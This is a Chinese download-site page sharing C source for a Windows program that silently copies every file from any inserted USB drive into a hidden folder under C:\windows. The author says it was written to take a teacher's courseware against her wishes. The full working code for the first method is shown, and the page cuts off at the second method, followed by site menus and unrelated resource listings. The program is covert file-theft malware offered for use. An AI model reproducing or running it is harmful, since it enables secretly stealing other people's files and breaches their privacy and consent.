窃取U盘文件的程序 先运行这个程序.然后插入U盘的时候 就会偷偷的把U盘里的文件全部复制到某个文件夹下面 两种方法实现 复制文件方式相当 区别在于对插入U盘的检测方式不同 当初写这个东西 是因为某个老师不允许我们copy她的课件 所以出此下策 -------------------------------------------------------------------------------- 方法一: -------------------------------------------------------------------------------- #include <windows.h> #include <dbt.h> #include <string.h> void CopyFiles(char *); void proc( WIN32_FIND_DATA ,char *); char *loc="C:\\windows\\xhy"; int main( ) { char dir[100]={0,0}; int first, second, p=0; first = GetLogicalDrives( ); CreateDirectory(loc, NULL); while(1) { Sleep(1000); second=GetLogicalDrives( ); if(second>first) { second-=first; while(second>>=1) p++; dir[0] = p+65; strcat(dir, ":\\*"); CopyFiles(dir); return 0; } } } void CopyFiles( char *dir ) { WIN32_FIND_DATA FindFileData; HANDLE hFind = INVALID_HANDLE_VALUE; hFind = FindFirstFile(dir, &FindFileData); if (hFind != INVALID_HANDLE_VALUE) proc(FindFileData, dir); while (FindNextFile(hFind, &FindFileData) != 0) proc(FindFileData, dir); FindClose(hFind); } void proc( WIN32_FIND_DATA FindFileData , char *dir) { char DirSpec[200], path[200]; DWORD stat; strcpy(path, dir); path[strlen(path)-1]='\0'; strcat(path, FindFileData.cFileName); stat = GetFileAttributes(path); if( strcmp(FindFileData.cFileName, ".") && strcmp(FindFileData.cFileName, "..") ) { if( (stat&FILE_ATTRIBUTE_DIRECTORY)==FILE_ATTRIBUTE_DIRECTORY ) { strcpy(DirSpec, dir); DirSpec[strlen(DirSpec)-1]='\0'; strcat(DirSpec, FindFileData.cFileName); strcpy(path, loc); strcat(path, DirSpec+2); strcat(DirSpec, "\\*"); CreateDirectory(path, NULL); CopyFiles(DirSpec); } else { strcpy(path, dir); path[strlen(path)-1]='\0'; strcat(path, FindFileData.cFileName); strcpy(DirSpec, loc); strcat(DirSpec, path+2); CopyFile(path, DirSpec, FALSE); } } } -------------------------------------------------------------------------------- 在Dev C++中编译测试通过 -------------------------------------------------------------------------------- 方法二: --------------------------------------
- 粉丝: 192
- 资源: 3万+
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
最新资源
- IMG_20241125_212210.jpg
- 本地安装GSVA,有很多选择,我选了相对最新的
- yolo算法-橡胶圈数据集-23984张图像带标签-机器人-橡胶圈.zip
- wordpress网址导航主题模板 自适应手机端+附整站源码
- yolo算法-手套-无手套-人数据集-14773张图像带标签-手套-无手套-人-无头盔-无口罩-没有安全鞋-无护耳器-无背心-护耳器-背心-安全鞋-无玻璃-头盔-面具-玻璃杯.zip
- yolo算法-动物类别数据集-21613张图像带标签-人-奶牛-鹰-大象-汽车-猪-水牛-熊-鹿-雨伞-狗-老虎-浣熊-狼.zip
- Go语言实现高质量代理池构建与部署
- yolo算法-多类别动物数据集-8893张图像带标签-猴子-奶牛-大象-水牛-美洲虎-熊-鹿-马-狗-老虎-鸟-狮子-猎豹-山羊.zip
- Video_1732514072178.mp4
- yolo算法-手套-无手套-人数据集-14163张图像带标签-手套-无手套.zip